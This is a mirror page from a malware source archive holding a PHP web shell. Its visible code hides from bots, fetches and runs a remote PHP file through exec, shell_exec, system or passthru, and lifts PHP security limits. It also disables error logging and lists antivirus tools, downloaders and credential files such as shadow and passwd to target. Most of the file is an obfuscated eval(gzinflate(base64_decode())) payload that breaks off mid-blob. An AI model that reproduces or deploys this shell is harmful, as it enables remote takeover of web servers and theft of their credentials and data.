mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
80 lines
59 KiB
Plaintext
80 lines
59 KiB
Plaintext
|
<?php
|
|||
|
|
|||
|
if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}
|
|||
|
|
|||
|
if(isset($_POST['start_socks'],$_POST['download_path']))
|
|||
|
{
|
|||
|
function execute($cfe)
|
|||
|
{
|
|||
|
$res = '';
|
|||
|
if(@function_exists('exec')) { @exec($cfe,$res); $res = join("\n",$res); }
|
|||
|
elseif(@function_exists('shell_exec')) $res = @shell_exec($cfe);
|
|||
|
elseif(@function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); }
|
|||
|
elseif(@function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); }
|
|||
|
}
|
|||
|
|
|||
|
@$f=fopen('/tmp/httpd_conf.tmp.php','w');
|
|||
|
fwrite($f,file_get_contents($_POST['download_path'])); fclose($f);
|
|||
|
$path = execute("which php");
|
|||
|
@execute("$path /tmp/httpd_conf.tmp.php &");
|
|||
|
die;
|
|||
|
}
|
|||
|
|
|||
|
$language='eng';
|
|||
|
|
|||
|
$auth = 0;
|
|||
|
|
|||
|
$name='7d1f6442a9ed59e62f93dcbc2695baa6';
|
|||
|
$pass='7d1f6442a9ed59e62f93dcbc2695baa6';
|
|||
|
|
|||
|
//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
|
|||
|
@setlocale(LC_ALL,'ru_RU.cp1251');
|
|||
|
|
|||
|
@ini_restore("safe_mode");
|
|||
|
@ini_restore("open_basedir");
|
|||
|
@ini_restore("safe_mode_include_dir");
|
|||
|
@ini_restore("safe_mode_exec_dir");
|
|||
|
@ini_restore("disable_functions");
|
|||
|
@ini_restore("allow_url_fopen");
|
|||
|
|
|||
|
if(@function_exists('ini_set'))
|
|||
|
{
|
|||
|
@ini_set('error_log',NULL);
|
|||
|
@ini_set('log_errors',0);
|
|||
|
@ini_set('file_uploads',1);
|
|||
|
@ini_set('allow_url_fopen',1);
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
@ini_alter('error_log',NULL);
|
|||
|
@ini_alter('log_errors',0);
|
|||
|
@ini_alter('file_uploads',1);
|
|||
|
@ini_alter('allow_url_fopen',1);
|
|||
|
}
|
|||
|
|
|||
|
error_reporting(E_ALL);
|
|||
|
|
|||
|
/* <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> */
|
|||
|
$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
|
|||
|
$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm',
|
|||
|
'tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
|
|||
|
$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
|
|||
|
$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');
|
|||
|
|
|||
|
/* <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> realpath() */
|
|||
|
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
|
|||
|
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";
|
|||
|
//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";
|
|||
|
//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";
|
|||
|
//$chars_rlph = "_-.01234567890";
|
|||
|
$chars_rlph = "abcdefghijklnmopqrstuvwxyz";
|
|||
|
|
|||
|
$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
|
|||
|
'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
|
|||
|
'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
|
|||
|
'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing','Windows',
|
|||
|
'Documents and Settings','Program Files','boot.ini','apache');
|
|||
|
|
|||
|
/******************************************************************************************************/
|
|||
|
|
|||
|
eval(gzinflate(base64_decode('HJ3HcqTYFkU/53UEA7wb4n3i7eQFPvHefn2neqiKKAku5+69lhJQeab9P/XbjFWf7uU/WbqVBPb/osynovznf7L6yvnyKmLngzjqCwx5ZdiKop6I1xxCaS9doEtcod/eFge3QqNud/0ETSgDHLO0IB4rW8b3zbRaJyu4C3J4pKmXTpwyAD7OcPMUD0XegNxypmFPfeO0qlsdUEf7hT7k3H4y46K2nNeZCYE9mx8M5pp2/Gt/MYfVER+5HXcGBaCWpWXa+HlaVcgk5vBbvih1dfPmwMhqHWFcG2iO2541nwoZLXdMZEH15U0cG8cwgsCq7HBL1h0eR9TV5DfWKErgFnBtrivujiplhnqqDr/RbdV21hpBZKyty4khdDtBi1EEFMB+hmFHmS+dwCFopAZIui+b5AHtfoQfol66ribCHQPCVj5JCMzAlWCE9LngnDlhTz0Ea7PQcD2D5gxqnY3z0kX1FsxiJ0AKGatVeDmdxwmA/ZW9uQwqibUR5eMB8PXUAZ8qTH/enJ0Ifot71gKAeW6JlrbWbrqwWwDJVi+vOLn0yW3G+UI20ffSwSqdlm/P7Mq+2OGtBVO7pURWqWumlF8V8u+neYrrwQPhsYWTcXZvEF2ZLQYhlAxHJe4mEiqLTVqsSS5avyVbWDLZ5IpKyZsPBneXzLjdvqOHNzLUMFbbqQRbWFem/Oq7OerfeWdUZ/sk0Blc+CTBVbFjSYD4Z8jnidSYKH5bgYnIbk8nhrLVR9TlJcjehdF9n2ZhWI2MZxL048Anxa+ehTD4tAGeZkLYEub22EESHJLw9X9DrEjjt+jsHKEw20NukYv0j0ziMBHrmwKZjOZF5gD0Yk18wOZTZHmogKqm1sdWnY37+1qYv/unrKgzfsdMvVyA4Nmb7MXWoxQjhFtq4hDccUlFOtJqR8oiii2yY1lYiVgEfIQlYslBxakMCo1+wqtFGZE+wveQQZOl7/qeWabqe0DlaKawZow8B+U4cmL2oE/SPuczuILKV3C4XuP1c8Y4VA9w7BhfIEpNVJxPe0998r1CeELwnKvNewk/7cCzOoyz3iumS++QPMry6FdOIc9YoAGtp71u7GmbUy+ocaKJ1RiIpVJC+jjKbwrzTKelF90/5TpDSsoo6OyUBzDwohD/anWhH+r4Tq3Phtz3y/GgHrfbt0bEXiUFDyuCiGwrpW+bBTKyz7AzaLFSDHlCy3FABHGYvOp4vCnp2jlOCx/hKTWPchikCbKkLvwenHXP0VVSuO6pyhIAXHyNMnVgHCHFjF9pvoSTLOa1ZdF/pTpisF3HAI9XWSOeL1EjtGgwg9EcBW9UZhELZqlUEiQcKBZlAWV/DVWCJjHwBPTgeR75GPewdos8R/MyngYk+uv0ibZwUi1RyWQiVEicOmKeVs1DAcz+Qm4ibe6Jb89vonmcDUBPUgJ1H8z+eJ0NT28R6/IO/tmaQeeEMDDoUZJTXcLygEOJRg3kt9KfvLIWyW+XHcGqDyeet1w3scjew87bX3ddXqOwun4c0lVBifXzNWeUAQXVMYS5UUs4cWSYe2qjzGArQmmLRNsdC25l+VDZNRWCR2WHe0fiYYVCZWuo8WDDLX3j6tsOzbTvrfWheX5qZCgEe1I28ZBK2O3sYAQ6CZMy44G5v8PZLhLmfe2nYrplMAKcKviddwMRA8oKMkda9fp+FvMAkJ1fSENCqQG2rp5f8KtrVYCe/kiqoT8iV2G9OBMCgD4mK2d70FwuB4YJl3aJnWTSn7B5uziCI0o7cz3+eGudeNlSndVaZF84WCbNTEGbo880F543UZSbz0021UDEVEIfr3puve6E10am81jmicTfV/akF+NYvfWKgVXF8ITLzYNcMy3AcSNln79w/8ShMoxlWJ586uWPLZcf/IwOHF2/Y2WHMWgE4hiwzwagymbM0Nk7rQXQHW9fo0UsDQ3LCfLxqNEYmZ7O38FaaPgrfEmINlFaYVEJffXh5XqEhYM3Gh3zjU5UDUcciNWQMNZoiq5K3C/KIvb1sk1Hnmr//Qymqyp9EIkNISFzqkdq6Yks5geBWQXJem5cY/o47ddIZlbTNXzlD0Hi8mfFiI57zm+AibCQ1PMoApli41l/SbcxI0+QN4c1lvtoNhKCZWJUMyoBp6ggImm2YW3YZN/FO9zBeUIeYIYc823nU2FSvASnvsfOciVlpUWd5TIXXx160Gbx6g6TLyCFI0yfBAxumhtqmTyn8Xz2bgi681GIUaN4gBDYQFqIs7QnS1BcMJyZ48ObX57A8RHepnde7Bnle7yjqwV7TW76MAdRsje30XT7+r4Ezw+PaEhAB762LVgtUIR1RK6IvyDhcyF+cUo9faBxtQcAjjQ599/XiI/tlxv7RehDghzu5xt5EHnE61djZq//yuX2PCj3CO6H4PgWBxNlD6BniWXS4boo1sYWazeMHm1vTVnoZtV4nN5lmMbWWleTalq99Smv24o5074H0uvHgA08gojpAys9pXA2LcpTMyW+p5unC/bfz6sZAZDjOip+l1VX0KgUAqU5Fiz2uxMUXa5lpCm2hhLbNUcvZZD/mJNBlaEBOQFpg3qSxRIw/M7mna4CG4/ZCVXLX63q5FB51JjGR6RBoKfjUwmpiJN5kxus+OMpHNQH/dNVbe4u0aKTiTrPw81YGZlQDdxr42V2rw8ZPF9wQAC/a+Ov1cfPTmdYvLnugok90iIkeKvAOZZjX/2KJp/mCkIcKwOnnkZ6Qq2FJWjYQFbnCzLevCkb34UBi69pxjLj0yIKhsPhjkVRLchGPWMOiplLv34KQzU1V8250Ir7K9no9RebPi3u89tpmGqWmRtnYv6KJV3PHXZfU0hP2TBTv7kje8KXiHUlK0Yr0fNZWwBmtuL6lL/hH2Bg/OaJl0yvVzdKZzHfwxXEMOUUTMYBzBdN/q9VByrfA5QbYMmR/eosvztoDK2ASIpT5q6RUssHNf3t2/sEALqUyZPNcH1YugyQgBHbCHJxs4dI/GbE7hHjHL/FKWTMBNVgEIrVbgbz+8QLCant0BUqqSi+iDF4TNSGt8TFDEx94Ryuc4ilGsfBOOOtLN3AEXE6dD79EK6V217gmVur2GTgdB9IOP1CGUulnFNTnyj5WfCUxzRktlHfESNny77So1XGjwDbRMOilm36zJtKMv8S18bZyy9bQp+LsaJ8u03YwOwynMLMbf4UR16/Z4e+qlKw3TKdIiGKrE110CfgJtF2ZtpFfsFzdwTNZvRedtJeLaedoBEc47hRB5qc7M2p8vhgeM1Gr+g5VCU669poJTCsqGz2Gy81SYjsZY2T7+lFMZRsyziOXaO87SvP1NwZKlrJr3zTY4SBAcljbH4NpyZ03uZVtBuDNV4ttBfPq1uo6KX7J/U+hWiDkiify4OnCpZYWAP5VIU2m//TlSOw6wvkK1GDzPBI0+YL7SQe/E4qtFaemw0JWJ4jlmv+cyw9zJBvEYYEjBfcqhixuUQEULPCC6vr19nwoJ1xu/nwloyeyTWL45dXD5VR7dekJgvK5hFzTc3XIbld6HnLKO65od/eGeon2OsywZup8iBUogIhZW2DtXJs0+KUAHY3cEkqmACk55CkgJLSk9q8FYbn21O/NB2hNYeZ6ylTwDSgfhWuemPb37GsOFpARKCwunA1BQYgubndOD4MVAJR2AHfOTv4ud6lDawoct8PhVphmZpa+iMoK8JIT+GDI4Ou2bl+1RCDRqOJqj5f2ozONwsEt1lBK5XAYlwvAV5xXOCN4h8jHC/zAuETvlTx1L9/57AsvmCQbPlyPUrKEjBEN5d9+dkV6NeJ9KljAZmgnjP1S1UpkfCaeALBc29GdIbU4G5RBIT5w7oTC+7Qi8eZdRzdtbi0bza438GZLN2s5vOTl2oXCV52fFCVzhWdyx6iYcxoUwcnBgPpbEQqNEyy5lCtFbbNKa0ibKYfcgXOheLUfRCgoxSazx18MwhZ70sAfx5sAtxf6MeUVE1bw0vnM5Z9jAOCndFh8BUsjGWU/CUXNePK6Dv10k1bYmMC7PKAU0m5z3rBxQhOrBLEHIMQ3oKSScGytferDjU3C
|